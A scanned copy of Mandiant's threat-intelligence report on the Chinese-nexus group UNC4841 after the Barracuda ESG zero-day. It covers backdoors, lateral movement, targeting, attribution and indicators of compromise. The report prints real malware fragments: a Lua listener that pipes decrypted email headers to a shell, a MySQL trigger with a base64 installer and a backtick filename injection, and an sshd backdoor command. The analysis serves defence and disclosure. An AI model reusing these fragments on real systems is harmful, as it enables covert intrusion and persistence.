cloud.google.com
Open in
urlscan Pro
209.85.232.101
Public Scan
Submitted URL: https://www.mandiant.com/resources/blog/unc4841-post-barracuda-zero-day-remediation
Effective URL: https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation/
Submission: On October 14 via api from IN — Scanned from CA
Effective URL: https://cloud.google.com/blog/topics/threat-intelligence/unc4841-post-barracuda-zero-day-remediation/
Submission: On October 14 via api from IN — Scanned from CA
Form analysis
2 forms found in the DOM/blog/search/
<form action="/blog/search/" class="A2C6Ob"><input class="BAhdXd" jsname="oJAbI" name="query" type="text" placeholder="Find an article..."><input type="hidden" name="language" value="en" hidden=""><input type="hidden" name="category" value="article"
hidden=""><input type="hidden" name="paginate" value="25" hidden=""><input type="hidden" name="order" value="newest" hidden=""><input type="hidden" name="hl" value="en" hidden=""><span class="A0lwXc" jsname="D8MWrd"
aria-label="Show the search input field." role="button" jsaction="click:jUF4E"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c" viewBox="0 0 24 24" role="presentation" aria-hidden="true" width="40" height="22">
<path d="M20.49 19l-5.73-5.73C15.53 12.2 16 10.91 16 9.5A6.5 6.5 0 1 0 9.5 16c1.41 0 2.7-.47 3.77-1.24L19 20.49 20.49 19zM5 9.5C5 7.01 7.01 5 9.5 5S14 7.01 14 9.5 11.99 14 9.5 14 5 11.99 5 9.5z"></path>
</svg></span></form>
/blog/search/
<form action="/blog/search/" class="A2C6Ob"><input class="BAhdXd" jsname="oJAbI" name="query" type="text" placeholder="Find an article..."><input type="hidden" name="language" value="en" hidden=""><input type="hidden" name="category" value="article"
hidden=""><input type="hidden" name="paginate" value="25" hidden=""><input type="hidden" name="order" value="newest" hidden=""><input type="hidden" name="hl" value="en" hidden=""><span class="A0lwXc" jsname="D8MWrd"
aria-label="Show the search input field." role="button" jsaction="click:jUF4E"><svg class="nRhiJb-Bz112c nRhiJb-Bz112c-OWXEXe-xgZe3c" viewBox="0 0 24 24" role="presentation" aria-hidden="true" width="40" height="22">
<path d="M20.49 19l-5.73-5.73C15.53 12.2 16 10.91 16 9.5A6.5 6.5 0 1 0 9.5 16c1.41 0 2.7-.47 3.77-1.24L19 20.49 20.49 19zM5 9.5C5 7.01 7.01 5 9.5 5S14 7.01 14 9.5 11.99 14 9.5 14 5 11.99 5 9.5z"></path>
</svg></span></form>
Text Content
cloud.google.com uses cookies to deliver and enhance the quality of its services and to analyze traffic. If you agree, cookies are also used to serve advertising and to personalize the content and advertisements that you see. Learn more. AgreeNo thanks Jump to Content Cloud Blog Contact sales Get started for free Cloud Blog Solutions & technology Security Ecosystem Industries * Solutions & technology * Ecosystem * Developers & Practitioners * Transform with Google Cloud * AI & Machine Learning * API Management * Application Development * Application Modernization * Chrome Enterprise * Compute * Containers & Kubernetes * Data Analytics * Databases * DevOps & SRE * Maps & Geospatial * Security * Infrastructure * Infrastructure Modernization * Networking * Productivity & Collaboration * SAP on Google Cloud * Storage & Data Transfer * Sustainability * Security & Identity * Threat Intelligence * IT Leaders * Industries * Partners * Startups & SMB * Training & Certifications * Inside Google Cloud * Google Cloud Next & Events * Google Maps Platform * Google Workspace * Financial Services * Healthcare & Life Sciences * Manufacturing * Media & Entertainment * Public Sector * Retail * Supply Chain * Telecommunications * Solutions & technology * AI & Machine Learning * API Management * Application Development * Application Modernization * Chrome Enterprise * Compute * Containers & Kubernetes * Data Analytics * Databases * DevOps & SRE * Maps & Geospatial * Security * Security & Identity * Threat Intelligence * Infrastructure * Infrastructure Modernization * Networking * Productivity & Collaboration * SAP on Google Cloud * Storage & Data Transfer * Sustainability * Ecosystem * IT Leaders * Industries * Financial Services * Healthcare & Life Sciences * Manufacturing * Media & Entertainment * Public Sector * Retail * Supply Chain * Telecommunications * Partners * Startups & SMB * Training & Certifications * Inside Google Cloud * Google Cloud Next & Events * Google Maps Platform * Google Workspace * Developers & Practitioners * Transform with Google Cloud Contact sales Get started for free Threat Intelligence DIVING DEEP INTO UNC4841 OPERATIONS FOLLOWING BARRACUDA ESG ZERO-DAY REMEDIATION (CVE-2023-2868) August 29, 2023 * * * * MANDIANT Written by: Austin Larsen, John Palmisano, John Wolfram, Mathew Potaczek, Michael Raggi -------------------------------------------------------------------------------- UPDATE (Aug. 21, 2024): This post has been updated to remove four indicators of compromise (IOC) in the Domains section. Based on further research, we have determined that there was insufficent evidence to confirm if these IOCs were related to this campaign. On June 15, 2023, Mandiant released a blog post detailing an 8-month-long global espionage campaign conducted by a Chinese-nexus threat group tracked as UNC4841. In this follow-up blog post, we will detail additional tactics, techniques, and procedures (TTPs) employed by UNC4841 that have since been uncovered through Mandiant’s incident response engagements, as well as through collaborative efforts with Barracuda Networks and our International Government partners. Over the course of this blog post, Mandiant will detail how UNC4841 has continued to show sophistication and adaptability in response to remediation efforts. Specifically, UNC4841 deployed new and novel malware designed to maintain presence at a small subset of high priority targets that it compromised either before the patch was released, or shortly following Barracuda’s remediation guidance. We’ll also showcase how UNC4841’s deployment select backdoors suggests this threat actor anticipated, and prepared for remediation efforts, by creating tooling in advance to remain embedded in high-value targets, should the campaign be compromised. Furthermore, Mandiant will provide additional insights into the overall campaign timeline as well as a deeper look into UNC4841’s targeting, as observed through investigations at downstream customers, further strengthening the case for ties between UNC4841 and the People’s Republic of China. Since Barracuda released a patch to ESG appliances on May 20, 2023, Mandiant and Barracuda have not identified evidence of successful exploitation of CVE-2023-2868 resulting in any newly compromised physical or virtual ESG appliances. Only a limited number of ESG appliances worldwide were compromised (5% of ESG appliances), and impacted customers have been notified to replace the appliances. No other Barracuda product, including Barracuda’s SaaS email solutions, were impacted by this vulnerability. Mandiant and Barracuda investigations into previously compromised appliances confirmed UNC4841 deployed additional malware to a subset of devices and conducted additional post-exploitation activities. Mandiant assesses that, at the time of writing, a limited number of previously impacted victims remain at risk due to this campaign. UNC4841 has shown an interest in a subset of priority victims - it is on these victim’s appliances that additional malware, such as the backdoor DEPTHCHARGE, was deployed to maintain persistence in response to remediation efforts. Mandiant and Barracuda have reached out to individual victims where such activity has been identified. Mandiant’s recommendations remain unchanged — victims impacted by this campaign should contact Barracuda support and replace the compromised appliance. CAMPAIGN TIMELINE Since our initial blog post, Mandiant has assembled and analyzed an exhaustive timeline of all identified UNC4841 activity observed at victims impacted by the successful exploitation of CVE-2023-2868. As depicted in Figure 1, the campaign spanned the timeframe between October 2022 and June 2023, with an initial surge of CVE-2023-2868 exploitation activity occurring in early November 2022. Figure 1: Identified UNC4841 activity (blue) and victims (red) over the duration of the campaign Through our analysis of the campaign, Mandiant identified a distinct fall off in activity from approximately January 20 to January 22, 2023, a period that coincides with the beginning of the Chinese New Year — a national holiday observed within the People’s Republic of China. Additionally, further analysis of the timeline identified two surges in activity that followed Barracuda’s initial remediation efforts and public notification on May 23, 2023. The first surge occurred in the days immediately following the notification, where the actor retooled malware and changed persistence methods as detailed in our previous blog. This was followed by a second, previously undisclosed wave, that began in early June 2023. In this second wave, Mandiant discovered the actor attempting to maintain access to compromised environments via the deployment of the new malware families SKIPJACK, DEPTHCHARGE, and FOXTROT / FOXGLOVE. This second surge represented the highest intensity of UNC4841 activity identified by Mandiant across the entire campaign, demonstrating UNC4841’s determination in preserving access to specific victim environments. TARGETED TOOLING UNC4841 is a well-resourced actor that has utilized a wide range of malware and purpose-built tooling to enable their global espionage operations. One theme that has become apparent as our investigation has progressed is the selective deployment of specific malware families at high priority targets. The three code families we have observed being selectively deployed are SKIPJACK, DEPTHCHARGE, and FOXTROT / FOXGLOVE. Each of these malware families represent a level of increasing selectivity in their deployment. SKIPJACK SKIPJACK is a passive backdoor implemented by trojanizing legitimate Barracuda ESG modules by injecting malicious Lua code. Through the injected code, SKIPJACK establishes its backdoor capabilities by registering a listener for specific incoming email headers and subjects, and then decoding and executing the content of them. Mandiant has observed variations of SKIPJACK that utilize both the Content-ID and X-Barracuda-Spam-Info email header fields, an example of which can be seen in the following code snippet. if hdr:name() == "Content-ID" then if hdr:body() ~= nil then if string.match(hdr:body(), "^[%w%+/=\r\n]+$") then io.popen("echo " " .. hdr:body() .. "" | openssl aes-256-cbc -d -A -a -nosalt -K <REDACTED> -iv <REDACTED> 2>/dev/null | base64 -d | sh 2>/dev/null"):close() End end end Figure 2: SKIPJACK Listener As observed in the code snippet, the injected SKIPJACK code inspects whether the Content-ID header exists, and that it contains characters that would be present in a Base64 encoded string. When the condition is met, it proceeds to AES-256 decrypt and Base64 decode the header body, and then pipe the output to a system shell for execution. Around the time of Barracuda's initial notification regarding CVE-2023-2868, Mandiant observed UNC4841 creating bash scripts on previously compromised appliances with the filename of `mknod` in the path `/boot/os_tools/`. The `mknod` bash script checks whether the `mod_content.lua` script on the compromised appliance contains the string `OpenSSL`, and if not found, injects the code snippet in Figure 2 into the mod_content.lua script, effectively backdooring the legitimate Barracuda ESG module. Of these three malware families, UNC4841 most widely deployed SKIPJACK, which was observed on roughly 5.8 percent of all compromised ESG appliances. UNC4841 primarily targeted government and technology organizations with SKIPJACK; however, multiple other verticals were observed being targeted. Figure 3: SKIPJACK sector distribution Additionally, of all the malware families deployed by UNC4841 in this campaign, Mandiant found that SKIPJACK had the most variants. Although we identified evidence of many different SKIPJACK bash scripts existing on compromised appliances, we were not able to recover all instances of the malware. Based on the samples we did obtain, we suspect that each of these unrecovered variants contained different SKIPJACK code that utilized different sections within an email message to hide its encrypted command and achieve the same functionality. DEPTHCHARGE Another malware family Mandiant observed being selectively deployed by UNC4841 was a passive backdoor we named DEPTHCHARGE. DEPTHCHARGE, which is tracked by CISA as SUBMARINE, is packaged as a Linux shared object library, which is pre-loaded into the Barracuda SMTP (BSMTP) daemon using LD_PRELOAD. DEPTHCHARGE listens passively to receive encrypted commands, which it decrypts with OpenSSL and executes before sending the results, masqueraded as SMTP commands, back to the command and control (C2) server. DEPTHCHARGE is installed and persisted through a complex execution chain, which the actor crafted to enable infection of re-issued or clean appliances when the victim restored backup configurations from a previously compromised device. Figure 4 provides a depiction of the DEPTHCHARGE execution chain. Figure 4: DEPTHCHARGE execution chain The first stage of the DEPTHCHARGE execution chain existed in a file named `config.TRG`, which defines a malicious trigger (named `cuda` or `cuda_trigger`) in the MySQL database that stores the configuration for the Barracuda ESG appliance. TYPE=TRIGGERS triggers='CREATE TRIGGER cuda\nBEFORE DELETE ON config\nFOR EACH ROW\nBEGIN\n DECLARE i INT;\n SET i = 1;\n IF i = 1 THEN\n SELECT "<base64_payload>” INTO OUTFILE "/var/tmp/r";\n SELECT "echo -n Y2F0IC92YXIvdG1wL3IgfCBiYXNlNjQgLWQgLWkgfCB0YXIgLXp4IC1DIC92YXIvdG1wCm5va HVwIGJhc2ggL3Zhci90bXAvcnVuLnNoICAgMzExNTMgICAgPi9kZXYvbnVsbCAyPiYxICYKcm0gLWYgL3Jvb3QvbWFjaGluZVxgKg== | base64 -d | sh" INTO OUTFILE "/root/machine`echo -n Y2htb2QgK3ggL3Jvb3QvbWFjKlxgKgpzaCAvcm9vdC9tYWMqXGAq | base64 -d |sh`|";\n SET i = i + 1;\n END IF;\nEND' sql_modes=0 definers='root@localhost' Figure 5: DEPTHCHARGE trigger cat /var/tmp/r | base64 -d -i | tar -zx -C /var/tmp nohup bash /var/tmp/run.sh 31153 >/dev/null 2>&1 & rm -f /root/machine\`* Figure 6: DEPTHCHARGE decoded installer script The trigger is executed before a row is removed from the configuration database, an action which occurs frequently and at the time of restoration of a previous Barracuda ESG configuration. The first part of the trigger writes a Base64 payload to `/var/tmp/r`; a TAR archive that contains an installer shell script and the final DEPTHCHARGE backdoor payload. The remaining components of the trigger write a script to disk that decompresses this archive, run the installer script inside, and then remove the file on disk. However, it is not possible to execute a script directly from the MySQL trigger. Therefore, in order to execute the installer script, UNC4841 specially crafted a filename that would cause other components of the Barracuda ESG’s codebase that used the two-argument form of Perl’s open( ) function to execute commands (shown inside the backticks). Ultimately, this novel approach enabled UNC4841 to achieve command execution from the MySQL trigger and launch the DEPTHCHARGE script. The fact that UNC4841 identified and operationalized this complex execution path suggests that they had extensive knowledge of the device and had researched internal components of the Barracuda ESG appliance. The installer script `run.sh` is executed with an argument that specifies the DEPTHCHARGE `BSMTP_ID` configuration value (discussed as follows). The script is responsible for moving the DEPTHCHARGE payload to a legitimate directory on the appliance, and modifying the SMTP configuration file to pre-load the malware with the given BSMTP_ID configuration value upon execution of the BSMTP daemon. It also creates additional scripts that sleep for two minutes prior to execution, check if the pre-load persistence is present, and install it into the SMTP configuration file if it is not found. To further blend into legitimate activity, some variants of the script were also found to timestomp the malware files by inheriting timestamps from legitimate files on the system using the `touch` command. The DEPTHCHARGE backdoor can accept incoming TCP connections. It checks if the TCP source port of the client is equal to the value in the `BSMTP_ID` environment variable, and if so executes its backdoor capability as a Linux daemon. DEPTHCHARGE first connects to the appliance's SMTP port (127.0.0.1:25) to retrieve the appliance’s genuine SMTP banner, which it sends back to the attacker. This is likely used as an SMTP greeting message and to verify the identity of the appliance to which they are connecting. The malware is then able to receive encrypted commands that masquerade as SMTP EHLO commands, which are preceded with the string “ehlo” followed by a space. The encrypted commands are base64 decoded and AES decrypted with OpenSSL before being executed. The malware sends the results back to the attacker, again masquerading it as SMTP traffic: 250-mail2.eccentric.duck Hello <command body> [<client's IP address string>], pleased to meet you 250-SIZE 100000000 250-PIPELINING 250-8BITMIME 250 HELP Figure 7: DEPTHCHARGE SMTP greeting The SMTP reply sent by DEPTHCHARGE in response to a SMTP EHLO command contains the local hostname of “mail2.eccentric.duck”. This hostname is a hardcoded string and does not relate to any public registered domain name. It was common practice for impacted victims to export their configuration from compromised appliances so it could be restored into a clean one. Therefore, if the DEPTHCHARGE trigger was present in the exported configuration, it would effectively enable UNC4841 to infect the clean device with the DEPTHCHARGE backdoor through this execution chain, and potentially maintain access even after complete replacement of the appliance. Mandiant and Barracuda Networks identified instances where this may have occurred and notified victims accordingly. Additionally, Mandiant is aware that in some cases, this MySQL configuration database may contain plaintext passwords for user accounts. In these instances, we suspect the actor was harvesting these credentials for lateral movement purposes. The earliest evidence of UNC4841 deploying DEPTHCHARGE occurred on May 30, 2023, roughly one week after Barracuda’s initial notification. Mandiant observed UNC4841 rapidly deploy DEPTHCHARGE to select targets following Barracuda’s announcement that RMA was the recommended response action. This capability and its deployment suggests that UNC4841 anticipated and was prepared for remediation efforts with tooling and TTPs designed to enable them to persist on high value targets. It also suggests that despite this operation's global coverage, it was not opportunistic, and that UNC4841 had adequate planning and funding to anticipate and prepare for contingencies that could potentially disrupt their access to target networks. Over the course of the investigation to date, Mandiant has identified UNC4841 deploying DEPTHCHARGE to roughly 2.64 percent of compromised appliances. These victims included U.S. and foreign government entities, as well as high tech and information technology providers. Figure 8: DEPTHCHARGE sector distribution FOXTROT / FOXGLOVE The final malware family Mandiant observed being selectively deployed by UNC4841 was FOXTROT / FOXGLOVE. FOXGLOVE is a launcher written in C that executes the hardcoded path of FOXTROT. The payload is executed along with additional encrypted arguments for the C2, port, secret key, and jitter. FOXGLOVE uses a combination of Base64, Mod(13), and XOR with a hard-coded key to encrypt arguments. Figure 9: FOXGLOVE encryption routine FOXGLOVE is implemented to be configurable, as the execution path and arguments can easily be changed. /usr/share/foxdoor/foxdoor_shell shell -t <Encrypted C2> -p <Encrypted Port> -s <Encrypted Secret> -r <Jitter> Figure 10: FOXGLOVE execution FOXTROT is a backdoor written in C++ that communicates via TCP and is able to be used as a proxy. Supported backdoor commands include keystroke capture, shell command execution, reverse shell creation, and file transfer. FOXTROT contains overlaps to REPTILE shell open source code. FOXTROT notably makes use of the default sequence `;7(Zu9YTsA7qQ#vw` as an acknowledgement token, and to signal session termination. FOXTROT, however, also includes backdoor commands and functionality not present in REPTILE. FOXTROT and FOXGLOVE are also notable in that they are the only malware families observed being used by UNC4841 that were not specifically designed for Barracuda ESGs. Based on functionality, FOXTROT was likely also intended to be deployed to other Linux-based devices within a network to enable lateral movement and credential theft. Additionally, FOXGLOVE and FOXTROT were the most selectively deployed of all the malware families used by UNC4841. At this time, Mandiant has only observed UNC4841 deploy FOXTROT and FOXGLOVE at government or government related organizations that were high priority targets for the PRC. Figure 11: FOXTROT / FOXGLOVE sector distribution LATERAL MOVEMENT Following Barracuda’s public disclosure of CVE-2023-2868, Mandiant identified UNC4841 performing internal reconnaissance and subsequent lateral movement actions within a limited number of victim environments. On May 16, 2023, Mandiant observed the first evidence of UNC4841 attempting to perform internal reconnaissance on a small number of victims' internal networks in which Mandiant was responding. In these cases, the actor utilized open-source tools such as fscan to perform host detection, port scanning, web fingerprint identification, web vulnerability scanning, domain control identification, and other reconnaissance actions. In one environment, the actor scanned more than 50 subnets over the course of nine days, with approximately 80 percent of these being completed in one day. Figure 12 shows an example output from the fscan tool recovered from a compromised ESG appliance. <redacted>::25 open <redacted>:25 open <redacted>:587 open <redacted>:443 open [*] NetInfo: [*]<redacted> [->]<redacted> [->]<redacted> [*] WebTitle: https://<redacted> code:200 len:701 title:IIS Windows Server <redacted>:25 open <redacted>:443 open [*] LiveTop <redacted>/16 段存活数量为: 65 [*] LiveTop <redacted>/16 段存活数量为: 26 [*] LiveTop <redacted>/16 段存活数量为: 13 <redacted>:25 open <redacted>:587 open <redacted>:53 open <redacted>:389 open Figure 12: fscan output In addition to the reconnaissance actions, Mandiant also observed UNC4841 attempting to move laterally from impacted ESG appliances within this same time period. Based on the activity observed over the course of the investigation, Mandiant believes UNC4841 was likely utilizing the contents of messages stored within the mstore, a temporary storage location on the ESG, to harvest credentials. In multiple instances, Mandiant identified cleartext credentials contained within the contents of messages stored on the ESG that UNC4841 subsequently used to successfully access the account through Outlook Web Access (OWA) on the first attempt. In more than one case, Mandiant observed UNC4841 utilizing OWA to attempt to log in to mailboxes for users within the victim organization. In one case, a relatively low number of unsuccessful OWA access attempts resulted in the lockout of a limited number of accounts. In the cases where UNC4841 was able to obtain unauthorized access to a limited number of accounts, Mandiant did not observe UNC4841 send any email from the compromised account. Mandiant assesses that UNC4841 was likely attempting to maintain access to compromised users’ mailboxes to gather information for espionage purposes post Barracuda remediation. In addition to attempts to move laterally to Active Directory and OWA, Mandiant also observed attempts by UNC4841 to move laterally via SSH to VPNs, Proxy Servers, and other edge appliances on the victims network. Mandiant also identified accounts created by UNC4841 within the etc/passwd file on roughly five percent of the previously impacted appliances, as another form of remote access. Account names followed a consistent format, containing four (4) randomly generated characters. The actor would then spawn a ssh daemon process to listen on a specific high port and allow login from this newly created user account as another means to maintain backdoor access to compromised appliances. An example of the command is shown as follows: /usr/sbin/sshd -p 48645 -oAllowUsers=rfvN In one case, Mandiant identified UNC4841 successfully accessing a Windows Server Update Services (WSUS) server utilizing a domain administrator account identified within the mstore on an ESG appliance. The access to WSUS is notable as Mandiant has observed other China-nexus espionage actors deploying malware on a WSUS server to inject fake updates for remote code execution in efforts to steal data from government entities. TARGETING In the two months since our introduction of UNC4841, Mandiant has also come to better understand UNC4841’s targeting of ESG appliances and their primary targets based on their selectivity in follow-on operations. Overall, Mandiant has observed targeted organizations across public and private sectors worldwide appear to be impacted by UNC4841 tools. While the majority of exploitation activity appears to impact the Americas, that may partially reflect the product’s customer base (Figure 13). Figure 13: Affected organizations by region Organizations observed to be impacted by UNC4841 sit in a wide variety of verticals, with the primary targets including national governments, high tech and information technology entities, local governments, telecommunications providers, manufacturing entities, and colleges and universities. Twenty six specific verticals were observed that spanned a broad spectrum of functions (Figure 14). Noteworthy sectors that were included in minority targeted segments included healthcare and biotechnology, public health, aerospace and defense, and semiconductors. Figure 14: Sector breakdown, percentage of impacted organizations Almost a third of identified affected organizations were government agencies. As stated in Mandiant’s earlier publication, shell scripts were uncovered that targeted email domains and users from ASEAN Ministry of Foreign Affairs, as well as foreign trade offices and academic research organizations in Taiwan and Hong Kong. In addition, the actors searched for email accounts belonging to employees of a government with political or strategic interest to the PRC while this victim government was participating in high-level, diplomatic meetings with other countries. This suggests targeted exfiltration was prioritized for specific high value geopolitical and economic users. A distinct prioritization of government agencies alongside high tech and information technology targets was also observed when examining UNC4841 tools deployed following Barracuda’s patching and initial disclosure of CVE-2023-2868. These factors support the assessment that the campaign had an espionage motivation. Figure 15: Government agencies worldwide appear to have been disproportionately targeted Following Barracuda’s announcement regarding CVE-2023-2868 and remediation efforts on May 23, 2023, new malware was deployed by the threat actor beginning on May 22, 2023. These malware families included SKIPJACK, DEPTHCHARGE, FOXGLOVE, FOXTROT, and a new version of SEASPY tracked as SEASPY V2. The first new payload observed was SEASPY v2 on May 22, 2023, followed by DEPTHCHARGE, FOXGLOVE, and FOXTROT from May 30, 2023 through early June. Interestingly, organizations that received these post-remediation malware families were weighted towards government (national), high tech, and information technology sectors. This may suggest a threat actor prioritization towards conventional espionage targets, and maintaining access to IT and managed service providers. Figure 16: Post-remediation UNC4841 malware deployment by sector Notably, among North American identified affected organizations, there were numerous state, provincial, county, tribal, city, and town offices that were targeted in this campaign. These organizations included municipal offices, law enforcement offices, judiciaries of varying levels, social service offices, and several incorporated towns. While overall local government targeting comprises just under seven percent of all identified affected organizations, this statistic increases to nearly seventeen percent when compared to U.S.-based targeting alone. In some instances, targeted entities had populations below 10,000 individuals. Local government targeting occurred mostly in the initial months of CVE-2023-2868 exploitation, with the majority of observed compromises beginning from October through December 2022. The volume of local government organizations impacted by UNC4841 post-remediation tools has since fallen to only 8 percent of observed impacted organizations. This decline may represent an evolving operational priority for UNC4841 over the duration of sustained threat activity. Regional information technology providers in the United States and Europe experienced a statistically notable volume of targeting among early instances of exploitation in which SALTWATER, SEASPY, and SEASIDE were delivered. These payloads were delivered as part of the initial compromise by UNC4841 without further actions on objectives carried out on the infected device. Mandiant does not maintain thorough visibility into adversary actions during the earlier stages of the campaign. However, we note that several indications were discovered during incident response, which demonstrate the actors were removing traces of their malicious activity on impacted devices. A possible conclusion of these three malware families being observed in isolation is adversaries have not yet prioritized the infected appliances for further compromise and deployment of later stage tools attributed to UNC4841. Alternatively, we recognize that subsequent tooling and indications of malicious activity may have been removed by the actors prior to the start of remediation engagements. From October 2022 to February 2023, the heightened volume of impacted IT and MSP providers with solely the initial payloads delivered may have been an attempt by UNC4841 to establish an initial foothold within this type of Barracuda ESG environment. Few of these impacted targets received later stage payloads or were associated with targeted commands that sought to exfiltrate data pertaining to specific users. Mandiant assesses with low confidence that this may suggest these organizations were targeted in an attempt to maximize access to domains managed by Barracuda ESG servers, rather than the IT providers being the intended final target of exploitation. Barracuda ESG allows the management of numerous email domains for the scanning of inbound email attachments, and information technology providers and managed service providers may be positioned to manage a greater variety of downstream customer email domains when compared to a single enterprise server. Additionally, as previously noted, high tech and information technology providers were the second most targeted sector by UNC4841 post-remediation tooling. A deeper examination of identified affected organizations showed a recurring targeting of sectors that are key to global governments maintaining a competitive technological and economic edge in the face of impending strategic state deadlines. Entities were observed within the semiconductor, public health, aerospace, artificial intelligence/autonomous vehicles, and rare earth metal production sectors. Further, religious based organizations were impacted by UNC4841 campaigns. A cluster of organizations with mission-based aid or stated evangelical missions that impact China (and Chinese claimed geographies such as Hong Kong and Taiwan) were observed being targeted with the initial stages of malware utilized by this threat actor. Unlike numerous impacted organizations that align with traditional espionage requirements, these entities only received early stage implants such as SALTWATER, SEASPY, and SEASIDE. This may suggest a lower priority among UNC4841 collection requirements with evidence of deeper compromise, persistence, and exfiltration being observed among entities aligning with more conventional geopolitical, defense, and technology related mandates. Based on the evidence available at the time of analysis, earliest compromises appear to have occurred on a small subset of appliances geolocated to mainland China. The C2 communications utilized during this early set of compromises also leveraged port 8080, while later compromises that occurred globally almost entirely leveraged port 443 or port 25. ATTRIBUTION Mandiant has previously assessed with high confidence that UNC4841 conducts espionage activity in support of the People’s Republic of China. Our assessment has not changed and has now been corroborated by independent assessments from government agencies. As we mentioned in our first blog post, several overlaps with other China-nexus actors have been identified throughout our investigation. However, Mandiant has not attributed activity tracked as UNC4841 to a previously known threat actor. HIGHER-LEVEL TRENDS IN CHINESE CYBER ESPIONAGE OPERATIONS Early in our investigation, we identified overlaps in infrastructure used by UNC4841 with that which we have associated with UNC2286, another China-nexus actor that we have observed active since at least 2019 and which has heavily targeted organizations in the Southeast Asia region. Activity Mandiant has attributed to UNC2286 overlaps with public reporting on GhostEmperor (Kaspersky) and FamousSparrow (ESET). While this finding does indicate a connection in the infrastructure used by both groups, it is likely an artifact of a shared infrastructure anonymization service or an infrastructure provider that is common between them. Additionally, Mandiant has recently observed another sophisticated espionage focused China-nexus actor, UNC3886, deploying custom malware based on modified REPTILE source code - similar to FOXTROT. A recent UNC3886 campaign leveraged a zero-day exploit for Fortinet appliances as well as an ecosystem of custom malware which included UNC3886’s backdoor CASTLETAP, which is adapted from REPTILE and designed to be utilized on FortiGate appliances. CASTLETAP achieves functionality similar to SEASPY and is also designed to passively listen for magic packets that activate the backdoor functionality and connect back to a C2 server with SSL encryption. Other malware families deployed by UNC3886 have also shown similar characteristics to those deployed by UNC4841. For example, DRIEDMOAT is another similar passive backdoor that has been observed with an embedded certificate stolen from the compromised appliance that it uses to encrypt its C2 communications, much like the technique we observed from UNC4841. Shared infrastructure and techniques for anonymization are common amongst Chinese cyber espionage actors, as is shared tooling and likely malware development resources. Mandiant assesses that these observations are evidence of the higher level trends we have observed in Chinese cyber espionage and the evolution toward more purposeful, stealthy, and effective operations that avoid detection and complicate attribution. It is likely that we will continue to observe Chinese cyber espionage operations targeting edge infrastructure with zero-day vulnerabilities and the deployment of malware customized to specific appliance ecosystems. OUTLOOK AND IMPLICATIONS Over the course of the investigation, UNC4841 has proven to be highly responsive to defensive efforts and has actively modified TTPs to maintain access within victim environments to continue their espionage operation. Mandiant strongly recommends impacted Barracuda customers continue to hunt for UNC4841 activity within networks impacted by a compromised ESG. Due to their demonstrated sophistication and proven desire to maintain access, Mandiant expects UNC4841 to continue to alter their TTPs and modify their toolkit as network defenders continue to take action against this adversary, and their activity is further exposed by the security community. Mandiant anticipates UNC4841 will continue to target edge devices in the future. In order to aid in the hunting UNC4841 activity, IOCs and detection rules can be found in the sections that follow. If you were impacted by this campaign, Mandiant recommends you contact the FBI at sf-barracudacve@fbi.gov. ACKNOWLEDGEMENTS We would like to thank the U.S. Cybersecurity & Infrastructure Security Agency (CISA) for their continued partnership and contributions to this report, as well as the Federal Bureau of Investigation (FBI) for their on-going collaboration and assistance in notifying impacted organizations. We would also like to thank the Australian Signals Directorate’s (ASD) Australian Cyber Security Centre (ACSC) for assistance in notifying victims. Additionally, we would like to thank Barracuda Networks for their decisive actions, transparency and partnership following the exploitation of CVE-2023-2868 by UNC4841. INDICATORS OF COMPROMISE (IOCS) NETWORK IOCS IP Address ASN NetBlock Location 101.229.146.218 4812 China Telecom CN 103.146.179.101 136933 Gigabitbank Global HK 103.27.108.62 132883 Topway Global Limited HK 103.77.192.87 10222 Multibyte Info Technology Limited HK 103.146.179.69 10222 Multibyte Info Technology Limited HK 103.77.192.13 10222 Multibyte Info Technology Limited HK 103.77.192.88 10222 Multibyte Info Technology Limited HK 103.93.78.142 61414 Edgenap Ltd JP 104.156.229.226 20473 Choopa, LLC US 104.223.20.222 8100 CloudVPS US 107.148.149.156 399195 Pegtechinc-ap-04 US 107.148.219.227 54600 Peg Tech US 107.148.219.53 54600 Peg Tech US 107.148.219.54 54600 Peg Tech US 107.148.219.55 54600 Peg Tech US 107.148.223.196 54600 Peg Tech US 107.173.62.158 20278 Nexeon Technologies US 113.52.106.3 4609 Companhia de Telecomunicacoes de Macau SARL HK 137.175.19.25 54600 Peg Tech US 137.175.28.251 54600 Peg Tech US 137.175.30.36 54600 Peg Tech US 137.175.30.86 54600 Peg Tech US 137.175.51.147 54600 Peg Tech US 137.175.53.17 54600 Peg Tech US 137.175.53.170 54600 Peg Tech US 137.175.53.218 54600 Peg Tech US 137.175.60.252 54600 Peg Tech US 137.175.60.253 54600 Peg Tech US 137.175.78.66 54600 Peg Tech US 139.84.227.9 20473 Choopa, LLC ZA 155.94.160.72 8100 CloudVPS US 155.94.160.95 8100 ASN-QUADRANET-GLOBAL US 182.239.114.135 9231 China Mobile Hong Kong HK 182.239.114.254 9231 China Mobile Hong Kong HK 185.243.41.209 61414 Edgenap Ltd JP 192.74.226.142 54600 Peg Tech CN 192.74.254.229 54600 Peg Tech US 195.234.82.132 202422 G-Core Labs S.A. US 198.2.254.219 54600 Peg Tech US 198.2.254.220 54600 Peg Tech US 198.2.254.221 54600 Peg Tech US 198.2.254.222 54600 Peg Tech US 198.2.254.223 54600 Peg Tech US 199.247.23.80 20473 Choopa, LLC DE 213.156.153.34 202422 G-Core Labs S.A. US 216.238.112.82 20473 Choopa, LLC BR 23.224.42.5 40065 Choopa, LLC US 23.224.42.29 40065 Cnservers LLC US 23.224.78.130 40065 Cnservers LLC US 23.224.78.131 40065 Cnservers LLC US 23.224.78.132 40065 Cnservers LLC US 23.224.78.133 40065 Cnservers LLC US 23.224.78.134 40065 Cnservers LLC US 37.9.35.217 202422 G-Core Labs S.A. US 38.54.1.82 138915 Kaopu Cloud HK Limited SG 38.54.113.205 138915 Kaopu Cloud HK Limited MY 38.60.254.165 174 Cogent Communications US 45.148.16.42 42675 Obehosting AB DK 45.148.16.46 42675 Obehosting AB DK 45.154.253.153 41634 Svea Hosting AB GB 45.154.253.154 41634 Svea Hosting AB GB 45.63.76.67 20473 Choopa, LLC US 51.91.79.17 16276 OVH SAS FR 52.23.241.105 14618 Amazon.com US 54.197.109.223 14618 AMAZON-AES US 64.176.4.234 20473 Choopa, LLC US 64.176.7.59 20473 Choopa, LLC US DOMAINS bestfindthetruth[.]com goldenunder[.]com note.goldenunder[.]com singamofing[.]com singnode[.]com mx01.bestfindthetruth[.]com xxl17z.dnslog[.]cn HOST IOCS Hash Filename Type 06528143748b54793b2a7561d96138c5 